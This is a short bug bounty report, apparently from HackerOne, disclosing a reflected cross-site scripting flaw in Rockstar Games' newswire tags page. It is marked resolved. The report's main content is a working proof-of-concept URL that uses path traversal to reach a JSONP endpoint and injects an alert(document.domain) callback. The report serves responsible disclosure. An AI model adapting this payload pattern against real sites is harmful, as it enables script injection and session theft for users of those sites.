Reflected XSS via #tags= while using a callback in newswire http://www.rockstargames.com/newswire
Medium
R
Rockstar Games
Submitted None
Actions:
Reported by
nahamsec
Vulnerability Details
Technical details and impact analysis
Hello,
Here's the link:
http://www.rockstargames.com/newswire/tags#/?tags=../../comments_dal/users/getGlobalLoginSettings.json?callback=alert%28document.domain%29//
Thanks,
Ben
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-site Scripting (XSS) - Generic